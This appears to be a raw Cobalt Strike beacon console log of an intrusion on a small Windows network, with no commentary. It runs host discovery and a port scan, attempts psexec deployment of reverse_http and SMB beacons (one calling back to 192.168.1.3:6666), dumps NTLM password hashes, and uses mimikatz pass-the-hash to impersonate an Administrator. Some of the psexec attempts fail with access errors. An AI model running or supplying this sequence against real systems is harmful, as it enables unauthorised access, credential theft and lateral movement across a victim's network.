[+] established link to parent beacon: 192.168.1.2
beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 76344 bytes
[+] received output:
List of hosts:
[+] received output:
Server Name IP Address Platform Version Type Comment
----------- ---------- -------- ------- ---- -------
HEMA1 192.168.1.5 500 6.1
HEMA2 192.168.1.6 500 6.1
HEMA3 192.168.1.13 500 6.1
HEMA5 192.168.1.2 500 6.1
WTP-PC
192.168.1.12 500 6.1
beacon> portscan 192.168.1.12 1-1024,3389,5900-6000 none 1024
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.1.12
[+] host called home, sent: 75325 bytes
[+] received output:
192.168.1.12:139
192.168.1.12:135
[+] received output:
192.168.1.12:554
192.168.1.12:445
Scanner module is complete
beacon> psexec WTP-PC ADMIN$ http
[*] Tasked beacon to run windows/beacon_http/reverse_http (192.168.1.3:6666) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$99981.exe)
[+] host called home, sent: 14985 bytes
[-] could not upload file: 5
[-] Could not open service control manager on WTP-PC: 5
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 64069 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wtp:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth HEMA5\Administrator 31d6cfe0d16ae931b73c59d7e0c089c0
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:HEMA5 /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:"cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f" command
beacon> psexec WTP-PC ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\WTP-PC\pipe\status_7777) on WTP-PC via Service Control Manager (\WTP-PC\ADMIN$638e2.exe)
[+] host called home, sent: 679790 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] could not upload file: 1331
[-] Could not open service control manager on WTP-PC: 5
[-] Could not connect to pipe (\WTP-PC\pipe\status_7777): 1331
[-] could not connect to pipe: 1331
[+] received output:
user : Administrator
domain : HEMA5
program : cmd.exe /c echo 1b932da7028 > \.\pipe\ca907f
impers. : no
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
| PID 3184
| TID 2212
| LSA Process is now R/W
| LUID 0 ; 19179194 (00000000:0124a6ba)
\_ msv1_0 - data copy @ 001C6B0C : OK !
\_ kerberos - data copy @ 001A8628
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null